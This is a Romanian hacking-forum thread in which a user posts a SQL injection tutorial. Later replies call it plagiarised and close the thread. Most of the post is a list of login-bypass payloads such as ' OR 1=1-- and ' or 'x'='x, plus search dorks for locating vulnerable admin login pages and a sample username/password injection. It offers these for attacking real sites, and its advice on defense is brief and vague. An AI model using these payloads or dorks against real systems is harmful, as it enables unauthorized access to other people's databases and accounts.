EliteHackers
SALUT 2022!! NE-AM MUTAT PE DISCORD ! Vrei să inviți un prieten? [T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r Acesta aste link-ul oficial al acestui server. 		Lista Forumurilor Pe Tematici
EliteHackers | Reguli | Inregistrare | Login

POZE ELITEHACKERS

Nu sunteti logat. 		Nou pe simpatie:
miKyg_sim din Bucuresti
Femeie
19 ani
Bucuresti
cauta Barbat
26 - 50 ani
EliteHackers / Recycle Bin / SQL Injection Moderat de Ad_Infinitum, AntiKiler, Puscas_marin, r3v
Autor
Mesaj Pagini: 1
mylife_4hacking
EliteHackers Gold

Inregistrat: acum 17 ani
Postari: 50
::::Metoda explicata cu LIVE demonstration::::
SQL Injection este metoda care exploateaza erorile din codul aplicatiilor si permite atacatorului sa injecteze comenzi SQL in formele de login  feedback forms,cu scopul obtinerii accesului la informatiile din baza de date.SQL Injection functioneaza deoarece formele de imput permit expresii SQL sa patrunda direct in baza de date.
Construind programme cu SQL pentru a manipula comenzile din baza si in acest fel capatand acces.
Cea mai folosita este SQL login bypass ,injectand in sectia de login si password.

Code:


Exemplu : ‘ OR 1=1—
                      Schema URL: ‘ OR 1=1—
  Alte comenzi : admin’—
                           ‘ OR 0=0—
                            “ OR=0—
                             OR 0=0—
                        ‘ HI OR 1=1—
              " or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

Cautam astfel de siteuri cu urmatoarele  dorkuri :
”adminlogin.asp”
”login.asp”
Cum sa te aperi de astfel de atacuri.
Sistemul trebuie evaluat pentru orice fel de vulnerabilitate ,codurile trebuie sa fie bug free ,si aplicatiile si tot ce face parte din infrastructura bine satinizate.
La fiecare schimbare a componentelor trebuie facut un web security audit.
Nu are rost sa intru in detalii si in plus nu cunosc indeajuns de mult baza SQL,insa daca nu aveti o infrastructura complexa de care sa aveti grija nici nu se merita sa va complicati.

LIVE demonstration


Username: ' or '='
Password: ' or '='

_______________________________________
Vizitatima ca nu regretati
pus acum 17 ani
   
Y2K
EliteHackers Silver

Inregistrat: acum 17 ani
Postari: 26
ma bucur ca ai copiat tutorialu si nu ai dat sursa ... o fine va zic eu : (c) IMPERFECT
pus acum 17 ani
   
ady1266
EliteHackers Helper

Inregistrat: acum 18 ani
Postari: 308
closed  & trased,datorita calitaii scrisului
pus acum 17 ani
   
Pagini: 1  

Mergi la